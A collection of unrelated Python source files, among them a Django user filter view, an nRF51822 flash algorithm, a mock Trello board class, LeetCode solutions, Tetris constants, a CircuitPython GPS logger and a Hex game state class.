return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
class UserFilterAPI(generics.ListAPIView):
queryset = User.objects.all()
serializer_class = UserSerializer
filter_backends = [filters.SearchFilter, DjangoFilterBackend]
filterset_fields = ['profile__organization', 'type']
search_fields = ['full_name']
|
"""
mbed CMSIS-DAP debugger
Copyright (c) 2006-2013 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from flash import Flash
flash_algo = { 'load_address' : 0x20000000,
'instructions' : [
0xE00ABE00, 0x062D780D, 0x24084068, 0xD3000040, 0x1E644058, 0x1C49D1FA, 0x2A001E52, 0x4770D1F2,
0x47702000, 0x47702000, 0x4c26b570, 0x60602002, 0x60e02001, 0x68284d24, 0xd00207c0L, 0x60602000,
0xf000bd70L, 0xe7f6f82cL, 0x4c1eb570, 0x60612102, 0x4288491e, 0x2001d302, 0xe0006160L, 0x4d1a60a0,
0xf81df000L, 0x7c06828, 0x2000d0fa, 0xbd706060L, 0x4605b5f8, 0x4813088e, 0x46142101, 0x4f126041,
0xc501cc01L, 0x7c06838, 0x1e76d006, 0x480dd1f8, 0x60412100, 0xbdf84608L, 0xf801f000L, 0x480ce7f2,
0x6006840, 0xd00b0e00L, 0x6849490a, 0xd0072900L, 0x4a0a4909, 0xd00007c3L, 0x1d09600a, 0xd1f90840L,
0x4770, 0x4001e500, 0x4001e400, 0x10001000, 0x40010400, 0x40010500, 0x40010600, 0x6e524635,
0x0],
'pc_init' : 0x20000021,
'pc_eraseAll' : 0x20000029,
'pc_program_page' : 0x20000071,
'begin_data' : 0x20000200,
'begin_stack' : 0x20001000,
'static_base' : 0x20000170,
'page_size' : 512
};
class Flash_nrf51822(Flash):
def __init__(self, target):
super(Flash_nrf51822, self).__init__(target, flash_algo)
|
# -*- coding: utf-8 -*-
from uuid import uuid4
import trello.board as board
from .trellolist import List
from .label import Label
class Board(board.Board):
def __init__(self, client=None, board_id=None, organization=None, name=''):
super().__init__(client, board_id, organization, name)
self.lists = []
self.labels = {}
# These ones were set in fetch operation
self.description = None
self.closed = False
self.url = None
def fetch(self):
raise NotImplementedError()
def save(self):
# In this version changes always are synced
pass
def set_name(self, name):
self.name = name
def set_description(self, desc):
self.description = desc
def close(self):
self.closed = True
def open(self):
self.closed = False
def get_list(self, list_id):
return self.client.get_list(list_id)
def get_lists(self, list_filter):
"""Get lists from filter
:rtype: list of List
"""
# TODO check default return value if board is empty
result = []
if list_filter == 'all':
result = self.lists
elif list_filter == 'open':
# TODO
raise NotImplementedError()
elif list_filter == 'closed':
# TODO
raise NotImplementedError()
else:
# # TODO Check what trello does here
raise ValueError('Invalid List Filter: ' + list_filter)
return result
def get_labels(self, fields='all', limit=50):
"""Get label
:rtype: list of Label
"""
# TODO fields pending
return list(self.labels.values())
def get_checklists(self, cards='all'):
"""Get checklists
:rtype: list of Checklist
"""
raise NotImplementedError()
def add_list(self, name, pos=None):
"""Add a list to this board
:name: name for the list
:pos: position of the list: "bottom", "top" or a positive number
:return: the list
:rtype: List
"""
# TODO pending to manage the position of the list
list = List(self, list_id=str(uuid4()), name=name)
list.pos = pos
self.client.add_list(list)
self.lists.append(list)
return list
def add_label(self, name, color):
"""Add a label to this board
:name: name of the label
:color: the color, either green, yellow, orange
red, purple, blue, sky, lime, pink, or black
:return: the label
:rtype: Label
"""
label = Label(self.client, str(uuid4()), name, color)
self.labels[label.id] = label
return label
def delete_label(self, label_id):
"""Delete a label from this board
:label_id: the ID of the label to delete.
:return: the label
:rtype: json
"""
# TODO review trello behaviour, probably if the label doesn't exist an exception is rised
return self.labels.pop(label_id, None)
def all_cards(self):
"""Returns all cards on this board
:rtype: list of Card
"""
filters = {
'filter': 'all',
'fields': 'all'
}
return self.get_cards(filters)
def open_cards(self):
"""Returns all open cards on this board
:rtype: list of Card
"""
filters = {
'filter': 'open',
'fields': 'all'
}
return self.get_cards(filters)
def closed_cards(self):
"""Returns all closed cards on this board
:rtype: list of Card
"""
filters = {
'filter': 'closed',
'fields': 'all'
}
return self.get_cards(filters)
def get_cards(self, filters=None, card_filter=""):
"""
:filters: dict containing query parameters. Eg. {'fields': 'all'}
:card_filter: filters on card status ('open', 'closed', 'all')
More info on card queries:
https://trello.com/docs/api/board/index.html#get-1-boards-board-id-cards
:rtype: list of Card
"""
# TODO
raise NotImplementedError()
def get_members(self, filters=None):
"""Get members with filter
:filters: dict containing query parameters.
Eg. {'fields': 'all', 'filter': 'admins'}
More info on possible filters:
https://developers.trello.com/advanced-reference/board#get-1-boards-board-id-members
:rtype: list of Member
"""
raise NotImplementedError()
# Add a member to a board
def add_member(self, member, member_type="normal"):
raise NotImplementedError()
# Removes an existing member of a board
def remove_member(self, member):
raise NotImplementedError()
def fetch_actions(self, action_filter, action_limit=50, before=None, since=None):
"""Returns all actions that conform to the given filters.
:action_filter: str of possible actions separated by comma
ie. 'createCard,updateCard'
:action_limit: int of max items returned
:before: datetime obj
:since: datetime obj
More info on action filter values:
https://developers.trello.com/advanced-reference/board#get-1-boards-board-id-actions
:rtype: json list of past actions
"""
raise NotImplementedError()
def get_last_activity(self):
"""Return the date of the last action done on the board.
:rtype: datetime.datetime
"""
# TODO
return []
|
'''
Write your pay computation to give the employee 1.5 times the
hourly rate for hours worked above 40 hours.
Enter Hours: 45
Enter Rate: 10
Pay: 475.0
'''
hrs = raw_input("Enter Hours:")
h = float(hrs)
rate = raw_input("Enter Hourly Rate:")
r = float(rate)
if (h<40) :
pay=h*r
print "Pay:", pay
elif (h>40) :
pay=40*r+1.5*r*(h-40)
print "Pay:", pay
|
import collections
import enum
# This file provides constants of game (windows size, colours within game, shape of tetrominos etc.)
# Window size, recommended minimum resolution is 500x720
SCREEN_WIDTH = 500
SCREEN_HEIGHT = 720
# Number of rows and columns in gameboard - where tetrominos fall:
# The original tetris has 22 rows and 10 columns (remember of borders - left, right and bottom!)
BOARD_COLUMNS = 10 + 2 # +2 stands for left and right border lines
BOARD_ROWS = 22 + 1 # +1 stand for bottom border line
# Colors used within game to draw, you can simply add your favorite color and use it within game
class Color(enum.Enum):
"""Make human-readable aliases of colors used in game"""
BLACK = (81, 70, 90)
DARKRED = (186, 202, 239)
# LIGHTBLUE = (173, 216, 230)
LIGHTBLUE = (243, 144, 15) # tetromino
ORANGE = (252, 178, 81)
RED = (198, 162, 226)
BORDER_BLOCK = -1
BUFFER_BLOCK = 1
EMPTY_BLOCK = 0
FALLEN_BLOCK = 2
# For calculating points within Evaluator
POINTS_HEIGHT = 5
POINTS_GAP = 10
# Sizes within game:
BLOCK_SIZE = 18 # (in pixels) single block of tetromino/gameboard
BOARD_WIDTH = BLOCK_SIZE * (BOARD_COLUMNS+1) # with one border row on the bottom
BOARD_HEIGHT = BLOCK_SIZE * (BOARD_ROWS+2) # with two borders on left and right
Gameboard_coords_on_screen = collections.namedtuple('Gameboard_coords_on_screen', ['top', 'left'])
# For drawing gameboard with borders around
BOARD_WITH_BORDER_COORDS = Gameboard_coords_on_screen(
top=(SCREEN_WIDTH / 2 - BOARD_WIDTH / 2),
left=(SCREEN_HEIGHT / 2 - BOARD_HEIGHT / 2),
)
# For actuall gameboard - when tetromino falls etc.
GAME_BOARD_COORDS = Gameboard_coords_on_screen(
top=BOARD_WITH_BORDER_COORDS.top,
left=BOARD_WITH_BORDER_COORDS.left + BLOCK_SIZE,
)
GAME_SINGLE_FRAME_SEC = 0.001 # interval between single steps
TIME_STEPS_TO_FALL_BUFFER = 200 # how many steps is needed to fall tetromino one block down
TETROMINO_SHAPES = {
"I": [
[0, 0, 1, 0],
[0, 0, 1, 0],
[0, 0, 1, 0],
[0, 0, 1, 0],
],
"Z": [
[0, 0, 0, 0],
[0, 1, 1, 0],
[0, 0, 1, 1],
[0, 0, 0, 0],
],
"S": [
[0, 0, 0, 0],
[0, 1, 1, 0],
[1, 1, 0, 0],
[0, 0, 0, 0],
],
"J": [
[0, 0, 0, 0],
[0, 1, 0, 0],
[0, 1, 1, 1],
[0, 0, 0, 0],
],
"L": [
[0, 0, 0, 0],
[0, 0, 0, 1],
[0, 1, 1, 1],
[0, 0, 0, 0],
],
"T": [
[0, 0, 0, 0],
[0, 0, 1, 0],
[0, 1, 1, 1],
[0, 0, 0, 0],
],
"O": [
[0, 0, 0, 0],
[0, 1, 1, 0],
[0, 1, 1, 0],
[0, 0, 0, 0],
],
}
MALICIOUS_LEVEL = 9
|
#! /usr/bin/python
'''
Palindrome Number
Determine whether an integer is a palindrome. Do this without extra space.
click to show spoilers.
Some hints:
Could negative integers be palindromes? (ie, -1)
If you are thinking of converting the integer to string, note the restriction of using extra space.
You could also try reversing an integer. However, if you have solved the problem "Reverse Integer", you know that the reversed integer might overflow. How would you handle such case?
There is a more generic way of solving this problem.
https://oj.leetcode.com/problems/palindrome-number/
'''
import re
class Solution:
# @return a boolean
# Here no extra space means constant space, does not mean no space at all...
# Need to clearify such questions in the future.
def isPalindrome(self, x):
if x < 0: return False
div = 1
while x/div >= 10:
div *= 10
while x > 0 and div > 1:
right = x%10
left = (x/div)%10
#print left, right, x, div
if right != left:
return False
x /= 10
div /= 100
return True
def isPalindrome_1(self, x):
x = re.sub('[^A-Z|a-z|0-9]','',x)
if x == reversed(x):
return True
else return False
if __name__ == "__main__":
s = Solution()
print s.isPalindrome(1200021)
|
# coding=utf-8
from nltk.corpus import stopwords
from textblob import TextBlob
import pandas as pd
import numpy as np
from nltk.stem import PorterStemmer
from nltk.corpus import stopwords
import requests
from translate import traducir
from wordcloud import WordCloud,STOPWORDS
import matplotlib.pyplot as plt
import unicodedata
import matplotlib.pyplot as plt
datos = pd.read_csv('datos_sentimientos.csv')
datos_pos = datos[ datos['sentimiento'] == 'positivo']
datos_cloud_pos = datos_pos['sugerencia_es']
datos_neg = datos[ datos['sentimiento'] == 'negativo']
datos_cloud_neg = datos_neg['sugerencia_es']
datos_plot_pos = datos_pos['sentiment_value']
datos_plot_neg = datos_neg['sentiment_value']
#dibujar x-y positivos y negativos
plt.plot(datos_plot_pos, 'g^', datos_plot_neg, 'rs')
#plt.axis([0, 200, -1, 2])
plt.show()
#dibujar nube de palaras
stopwordsList = stopwords.words('spanish')
newStopWords = ['a_la','de_la','de_lo','en_el','por_la','en_la','con_la','para_que','que_no','que_el','para_la','ya_que','a_los','que_se',
'en_el','me', 'se', 'mas', 'que_la', 'que_lo', 'a_las', 'para_los', 'que_es', 'y_que', 'de_que', 'de_las',
'en_las', 'y_de', 'lo_que', 'ya_sea', 'para_el', 'y_no' , 'en_las', 'deberia', 'deberian']
stopwordsList.extend(newStopWords)
def wordcloud_draw(data, color = 'black'):
words = " ".join(data)
cleaned_word = " ".join([word for word in words.split(" ")
if 'http' not in word
and not word.startswith('@')
and not word.startswith('#')
and word != 'RT'
])
wordcloud = WordCloud(stopwords=stopwordsList,
background_color=color,
width=2500,
height=2000,
normalize_plurals= True
).generate(cleaned_word)
plt.figure(1,figsize=(13, 13))
plt.imshow(wordcloud)
plt.axis('off')
plt.show()
print("Positive words")
wordcloud_draw(datos_cloud_pos,'white')
print("Negative words")
#wordcloud_draw(datos_cloud_neg)
#print train_pos
#print train
|
# -*- coding: utf-8 -*-
import numpy as np
from build_polynomial import build_poly
from costs import compute_mse_loss
def split_data(x, y, ratio, seed=1):
"""split the dataset based on the split ratio."""
# set seed
np.random.seed(seed)
p = np.random.permutation(len(x))
x_tr, x_te = np.split(x[p], [int(ratio*len(x))])
y_tr, y_te = np.split(y[p], [int(ratio*len(x))])
return x_tr, y_tr, x_te, y_te
def build_k_indices(y, k_fold, seed):
"""build k groups of indices for k-fold."""
num_row = y.shape[0]
interval = int(num_row / k_fold)
np.random.seed(seed)
indices = np.random.permutation(num_row)
k_indices = [indices[k * interval: (k + 1) * interval]
for k in range(k_fold)]
return np.array(k_indices)
def cross_validation(y, x, k_indices, k, lambda_, degree, cross_features_degree,
compute_weightsFunction, compute_lossFunction):
"""
selects kth group of indices as test set and rest as training set,
builds the polynomial features up to degree d
computes the weights based on the training set with the specified function
returns losses of training set and testing set with the specified function
"""
# determine the indices in the training set and those in the test set
tr_indices = np.concatenate( (k_indices[:k].ravel(), k_indices[k+1:].ravel()) )
te_indices = k_indices[k]
# select training and testing x and y
x_tr = x[tr_indices]
y_tr = y[tr_indices]
x_te = x[te_indices]
y_te = y[te_indices]
# build polynomial features
x_poly_tr = build_poly(x_tr, degree, cross_features_degree)
x_poly_te = build_poly(x_te, degree, cross_features_degree)
# find weights using the training data only
weights_tr = compute_weightsFunction(y_tr, x_poly_tr, lambda_)
# compute the losses for cross validation
loss_tr = compute_lossFunction(y_tr, x_poly_tr, weights_tr) # compute without lambda
loss_te = compute_lossFunction(y_te, x_poly_te, weights_tr)
return loss_tr, loss_te
def k_cross_validation(y, x, k_fold, lambda_, degree, cross_features_degree, seed,
compute_weightsFunction, compute_lossFunction):
""" do k-fold validation for input data (x,y) and polynomial features up
to given degree and with regularization constant lambda_
return the rmse of the mean losses for training and testing
seed is used to divide data into k groups
usually, just interested in the testing error
"""
losses_tr = []
losses_te = []
# construct k groups for cross-validation
k_indices = build_k_indices(y, k_fold, seed)
# compute training error and testing error for each of k_fold possibilities
for k in range(k_fold):
(mse_tr, mse_te) = cross_validation(y, x, k_indices, k, lambda_, degree, cross_features_degree,
compute_weightsFunction=compute_weightsFunction,
compute_lossFunction=compute_lossFunction)
losses_tr.append(mse_tr)
losses_te.append(mse_te)
# find validation error of k-fold cross-validation by averaging over the mse
rmse_tr = np.sqrt(2*np.mean(losses_tr))
rmse_te = np.sqrt(2*np.mean(losses_te))
return (rmse_tr, rmse_te) |
import numpy as np
A = np.array([[56.0, 0.0, 4.4, 68.0],
[1.2, 104.0, 52.0, 8.0],
[1.8, 135.0, 99.0, 0.9]])
#print(A)
cal = A.sum(axis = 1, keepdims = True) #axis = 0 : 세로로 더함 axis = 1 : 가로로 더함
print(cal)
#percentage = 100*A/cal.reshape(1,4)
#print(percentage) |
import time
import board
import busio
import math
import array
import sys
import struct
from adafruit_binascii import hexlify
import os
import microcontroller
import digitalio
import analogio
import rtc
time.sleep(1)
analogin = analogio.AnalogIn(board.A2)
voltage = (analogin.value * 3.3) / 65536
if voltage > 2:
print('not executing the code with USB connected') #has to be also chnage in boot.py
#to execute the code in USB mode
sys.exit()
RX = board.RX
TX = board.TX
uart_gps = busio.UART(TX, RX, baudrate=9600, timeout=1, receiver_buffer_size=128)
Change_uart_baudrate_38400 = bytes ([
0xB5, 0x62, 0x06, 0x00, 0x14, 0x00, 0x01, 0x00, 0x00, 0x00, 0xD0, 0x08, 0x00, 0x00, 0x00, 0x96,
0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8B, 0x54, #CFG-PRT
0xB5, 0x62, 0x06, 0x00, 0x14, 0x00, 0x01, 0x00, 0x00, 0x00, 0xD0, 0x08, 0x00, 0x00, 0x00, 0x96,
0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8B, 0x54, #CFG-PRT
])
uart_gps.write(Change_uart_baudrate_38400)
time.sleep(1)
uart_gps.deinit()
uart_gps = busio.UART(TX, RX, baudrate=38400, timeout=1)
class RTC(object):
@property
def datetime(self):
return time.struct_time((2018, 3, 17, 21, 1, 47, 0, 0, 0))
class UbxStream():
def __init__(self, uart):
# pyserial 3.x has min requirement python2.7
# read() returns string in 2.7, bytes object otherwise
self.buff = bytearray(98)
self._uart = uart
self._ubox_synch = ['b5', '62']
self.iTOW = self.year = self.month = self.day = self.hour = self.minute = ""
self.second = self.valid = self.tAcc = self.nano = self.fixType = self.flags = ""
self.flags2 = self.numSV = self.lon = self.lat = self.height = self.hMSL = self.hAcc = ""
self.vAcc = self.velN = self.velE = self.velD = self.gSpeed = self.headMot = self.sAcc = ""
self.headAcc = self.pDOP = self.headVeh = self.magDec = self.magAcc = ""
def read(self, timeout=1, reset=True):
if(reset):
self._uart.reset_input_buffer()
s1 = self._uart.read(1)
if not s1 == None:
s1 = hexlify(s1).decode('utf-8')
if s1 == self._ubox_synch[0]:
s2 = self._uart.read(1)
s2 = hexlify(s2).decode('utf-8')
if s2 == self._ubox_synch[1]:
self._uart.readinto(self.buff)
ubx_class = hexlify(bytes([self.buff[0]])).decode('utf-8')
if ubx_class == '01':
ubx_id = hexlify(bytes([self.buff[1]])).decode('utf-8')
if ubx_id == '07':
return self.ubx_NAV_PVT()
def ubx_NAV_PVT(self):
if(self.validate_checksum(1, 7, self.buff)):
buff_cpy = self.buff[4:96]
self.iTOW, self.year, self.month, self.day, self.hour, self.minute, self.second, self.valid, self.tAcc, self.nano, self.fixType, self.flags, self.flags2, self.numSV, self.lon, self.lat, self.height, self.hMSL, self.hAcc, self.vAcc, self.velN, self.velE, self.velD, self.gSpeed, self.headMot, self.sAcc, self.headAcc, self.pDOP, reserved11, reserved12, reserved13, reserved14, reserved15, reserved16, self.headVeh, self.magDec, self.magAcc = struct.unpack('LH5BBLlB2BB4l2L5lLLH6BlhH', buff_cpy)
self.ubx_class = '01'
self.ubx_id = '07'
return True
else:
return False
def validate_checksum(self, ubx_class, ubx_id, buff):
check1 = 0
check2 = 0
chk1 = buff[96]
chk2 = buff[97]
for i in range(0, len(buff)-2):
check1 = (check1 + buff[i]) % 256
check2 = (check1 + check2) % 256
if chk1==check1 and chk2==check2:
return True
else:
return False
uBX_nav_pvt_msg = UbxStream(uart_gps)
filefullpath = ''
############################################################
##################### START OF THE SETUP ###################
############################################################
def setup():
uBX_nav_pvt_msg = UbxStream(uart_gps)
Disable_NMEA = bytes ([
0xB5, 0x62, 0x06, 0x01, 0x08, 0x00, 0xF0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x24, # GxGGA
0xB5, 0x62, 0x06, 0x01, 0x08, 0x00, 0xF0, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x01, 0x2B, # GxGLL
0xB5, 0x62, 0x06, 0x01, 0x08, 0x00, 0xF0, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x02, 0x32, # GxGSA
0xB5, 0x62, 0x06, 0x01, 0x08, 0x00, 0xF0, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x03, 0x39, # GxGSV
0xB5, 0x62, 0x06, 0x01, 0x08, 0x00, 0xF0, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x04, 0x40, # GxRMC
0xB5, 0x62, 0x06, 0x01, 0x08, 0x00, 0xF0, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x05, 0x47, # GxVTG
0xB5, 0x62, 0x06, 0x01, 0x08, 0x00, 0xF0, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x05, 0x47, # GxVTG
])
uart_gps.write(Disable_NMEA)
time.sleep(1)
Disable_UBX = bytes ([
0xB5, 0x62, 0x06, 0x01, 0x08, 0x00, 0x01, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x12, 0xB9, #NAV-POSLLH
0xB5, 0x62, 0x06, 0x01, 0x08, 0x00, 0x01, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x13, 0xC0, #NAV-STATUS
0xB5, 0x62, 0x06, 0x01, 0x08, 0x00, 0x01, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x13, 0xC0, #NAV-STATUS
])
uart_gps.write(Disable_UBX)
time.sleep(1)
Enable_UBX = bytes ([
0xB5, 0x62, 0x06, 0x01, 0x08, 0x00, 0x01, 0x07, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x18, 0xE1, #NAV-PVT
0xB5, 0x62, 0x06, 0x01, 0x08, 0x00, 0x01, 0x07, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x18, 0xE1, #NAV-PVT
])
uart_gps.write(Enable_UBX)
time.sleep(1)
commands2 = bytes ([
#0xB5, 0x62, 0x06, 0x08, 0x06, 0x00, 0x64, 0x00, 0x01, 0x00, 0x01, 0x00, 0x7A, 0x12, #(10Hz)
0xB5, 0x62, 0x06, 0x24, 0x24, 0x00, 0x01, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x55, 0xb4,
0xB5, 0x62, 0x06, 0x24, 0x24, 0x00, 0x01, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x55, 0xb4,
0xB5, 0x62, 0x06, 0x08, 0x06, 0x00, 0xC8, 0x00, 0x01, 0x00, 0x01, 0x00, 0xDE, 0x6A, #(5Hz)
0xB5, 0x62, 0x06, 0x08, 0x06, 0x00, 0xC8, 0x00, 0x01, 0x00, 0x01, 0x00, 0xDE, 0x6A, #(5Hz)
])
uart_gps.write(commands2)
def create_file ():
global filefullpath
while True:
print(uBX_nav_pvt_msg.numSV)
if uBX_nav_pvt_msg.read() and uBX_nav_pvt_msg.numSV > 6:
foldername = '/{:02d}-{:02d}-{:02d}'.format(uBX_nav_pvt_msg.year - 2000,uBX_nav_pvt_msg.month,uBX_nav_pvt_msg.day)
filename = '{:02d}-{:02d}-{:02d}.csv'.format(uBX_nav_pvt_msg.hour,uBX_nav_pvt_msg.minute,uBX_nav_pvt_msg.second)
date = time.struct_time((uBX_nav_pvt_msg.year, uBX_nav_pvt_msg.month, uBX_nav_pvt_msg.day,
uBX_nav_pvt_msg.hour, uBX_nav_pvt_msg.minute, uBX_nav_pvt_msg.second,0,-1,-1))
my_rtc = rtc.RTC()
my_rtc.datetime = date
rtc.set_time_source(my_rtc)
try:
os.mkdir(foldername)
print('folder created')
except:
print('folder already exist')
os.chdir(foldername)
with open(filename, "a") as f:
f.write('time,lat,lon,hMSL,velN,velE,velD,hAcc,vAcc,sAcc,heading,cAcc,gpsFix,numSV\n')
f.write(',(deg),(deg),(m),(m/s),(m/s),(m/s),(m),(m),(m/s),(deg),(deg),,\n')
filefullpath = '{}\{}'.format(foldername,filename)
return
############################################################
##################### START OF THE LOOP ####################
############################################################
def loop():
create_file()
global filefullpath
FlySightString = ''
bufferMilliseconds = ''
trigger = False
counter = 0
with open(filefullpath, "a") as f:
while True:
if uBX_nav_pvt_msg.read():
bufferMilliseconds = round(uBX_nav_pvt_msg.nano / 100000000)*10
FlySightString = '{:04}-{:02}-{:02}T{:02}:{:02}:{:02}.{:02}Z,{:010.7f},{:010.7f},{:.3f},{:.2f},{:.2f},{:.2f},{:.3f},{:.3f},{:.2f},{:.5f},{:.5f},{},'.format(
uBX_nav_pvt_msg.year,uBX_nav_pvt_msg.month,uBX_nav_pvt_msg.day,
uBX_nav_pvt_msg.hour,uBX_nav_pvt_msg.minute,uBX_nav_pvt_msg.second,
bufferMilliseconds,(uBX_nav_pvt_msg.lat/10000000),(uBX_nav_pvt_msg.lon/10000000),
(uBX_nav_pvt_msg.hMSL/1000),(uBX_nav_pvt_msg.velN/1000),(uBX_nav_pvt_msg.velE/1000),
(uBX_nav_pvt_msg.velD/1000),(uBX_nav_pvt_msg.hAcc/10000),(uBX_nav_pvt_msg.vAcc/10000),
(uBX_nav_pvt_msg.sAcc/10000),(uBX_nav_pvt_msg.headMot/100000),(uBX_nav_pvt_msg.headAcc/100000),
uBX_nav_pvt_msg.fixType)
if uBX_nav_pvt_msg.numSV > 20:
FlySightString += "20\n"
else:
FlySightString += '{}\n'.format(uBX_nav_pvt_msg.numSV)
print(FlySightString)
f.write(FlySightString)
if int(uBX_nav_pvt_msg.velD/1000) not in range (-2, 3):
counter += 1
if counter >20 and not trigger:
trigger = True
counter = 0
if trigger:
if int(uBX_nav_pvt_msg.velD) <= 1000:
counter += 1
if counter >50:
f.close()
break
############################################################
################ STARTING THE FUNCTIONS ####################
############################################################
setup()
loop()
|
"""
Question -https://leetcode.com/problems/range-sum-query-2d-immutable/
"""
#Naive Approach - Time Taken - 8898ms
class NumMatrix:
def __init__(self, matrix: List[List[int]]):
self.matrix=matrix
def sumRegion(self, row1: int, col1: int, row2: int, col2: int) -> int:
sum=0
for i in range(row1,row2+1):
for j in range(col1,col2+1):
sum+=self.matrix[i][j]
return sum
#Dynamic Approach - Time Taken - 112ms
class NumMatrix:
def __init__(self, matrix: List[List[int]]):
rows=len(matrix)
if rows==0:
return
cols=len(matrix[0])
self.dp=matrix
for i in range(1,rows):
self.dp[i][0]+=self.dp[i-1][0]
for j in range(1,cols):
self.dp[0][j]+=self.dp[0][j-1]
for i in range(1,rows):
for j in range(1,cols):
self.dp[i][j]+=(self.dp[i-1][j]+self.dp[i][j-1])-self.dp[i-1][j-1]
def sumRegion(self, row1: int, col1: int, row2: int, col2: int) -> int:
sum=self.dp[row2][col2]
if(row1>0 and col1>0):
sum+=self.dp[row1-1][col1-1]
if(row1>0):
sum-=self.dp[row1-1][col2]
if (col1>0):
sum-=self.dp[row2][col1-1]
return sum |
print('What do you get when you cross a snowman with a vampire?')
input()
print('Frostbite!')
print() |
from numpy import zeros, int_
from unionfind import UnionFind
from meta import GameMeta
class GameState:
"""
Stores information representing the current state of a game of hex, namely
the board and the current turn. Also provides functions for playing game.
"""
# dictionary associating numbers with players
# PLAYERS = {"none": 0, "white": 1, "black": 2}
# move value of -1 indicates the game has ended so no move is possible
# GAME_OVER = -1
# represent edges in the union find structure for detecting the connection
# for player 1 Edge1 is high and EDGE2 is low
# for player 2 Edge1 is left and EDGE2 is right
# neighbor_patterns = ((-1, 0), (0, -1), (-1, 1), (0, 1), (1, 0), (1, -1))
def __init__(self, size):
"""
Initialize the game board and give white first turn.
Also create our union find structures for win checking.
Args:
size (int): The board size
"""
self.size = size
self.to_play = GameMeta.PLAYERS['white']
self.board = zeros((size, size))
self.board = int_(self.board)
self.white_played = 0
self.black_played = 0
self.white_groups = UnionFind()
self.black_groups = UnionFind()
self.white_groups.set_ignored_elements([GameMeta.EDGE1, GameMeta.EDGE2])
self.black_groups.set_ignored_elements([GameMeta.EDGE1, GameMeta.EDGE2])
def play(self, cell: tuple) -> None:
"""
Play a stone of the player that owns the current turn in input cell.
Args:
cell (tuple): row and column of the cell
"""
if self.to_play == GameMeta.PLAYERS['white']:
self.place_white(cell)
self.to_play = GameMeta.PLAYERS['black']
elif self.to_play == GameMeta.PLAYERS['black']:
self.place_black(cell)
self.to_play = GameMeta.PLAYERS['white']
def get_num_played(self) -> dict:
return {'white': self.white_played, 'black': self.black_played}
def get_white_groups(self) -> dict:
"""
Returns (dict): group of white groups for unionfind check
"""
return self.white_groups.get_groups()
def get_black_groups(self) -> dict:
"""
Returns (dict): group of white groups for unionfind check
"""
return self.black_groups.get_groups()
def place_white(self, cell: tuple) -> None:
"""
Place a white stone regardless of whose turn it is.
Args:
cell (tuple): row and column of the cell
"""
if self.board[cell] == GameMeta.PLAYERS['none']:
self.board[cell] = GameMeta.PLAYERS['white']
self.white_played += 1
else:
raise ValueError("Cell occupied")
# if the placed cell touches a white edge connect it appropriately
if cell[0] == 0:
self.white_groups.join(GameMeta.EDGE1, cell)
if cell[0] == self.size - 1:
self.white_groups.join(GameMeta.EDGE2, cell)
# join any groups connected by the new white stone
for n in self.neighbors(cell):
if self.board[n] == GameMeta.PLAYERS['white']:
self.white_groups.join(n, cell)
def place_black(self, cell: tuple) -> None:
"""
Place a black stone regardless of whose turn it is.
Args:
cell (tuple): row and column of the cell
"""
if self.board[cell] == GameMeta.PLAYERS['none']:
self.board[cell] = GameMeta.PLAYERS['black']
self.black_played += 1
else:
raise ValueError("Cell occupied")
# if the placed cell touches a black edge connect it appropriately
if cell[1] == 0:
self.black_groups.join(GameMeta.EDGE1, cell)
if cell[1] == self.size - 1:
self.black_groups.join(GameMeta.EDGE2, cell)
# join any groups connected by the new black stone
for n in self.neighbors(cell):
if self.board[n] == GameMeta.PLAYERS['black']:
self.black_groups.join(n, cell)
def would_lose(self, cell: tuple, color: int) -> bool:
"""
Return True is the move indicated by cell and color would lose the game,
False otherwise.
"""
connect1 = False
connect2 = False
if color == GameMeta.PLAYERS['black']:
if cell[1] == 0:
connect1 = True
elif cell[1] == self.size - 1:
connect2 = True
for n in self.neighbors(cell):
if self.black_groups.connected(GameMeta.EDGE1, n):
connect1 = True
elif self.black_groups.connected(GameMeta.EDGE2, n):
connect2 = True
elif color == GameMeta.PLAYERS['white']:
if cell[0] == 0:
connect1 = True
elif cell[0] == self.size - 1:
connect2 = True
for n in self.neighbors(cell):
if self.white_groups.connected(GameMeta.EDGE1, n):
connect1 = True
elif self.white_groups.connected(GameMeta.EDGE2, n):
connect2 = True
return connect1 and connect2
def turn(self) -> int:
"""
Return the player with the next move.
"""
return self.to_play
def set_turn(self, player: int) -> None:
"""
Set the player to take the next move.
Raises:
ValueError if player turn is not 1 or 2
"""
if player in GameMeta.PLAYERS.values() and player != GameMeta.PLAYERS['none']:
self.to_play = player
else:
raise ValueError('Invalid turn: ' + str(player))
@property
def winner(self) -> int:
"""
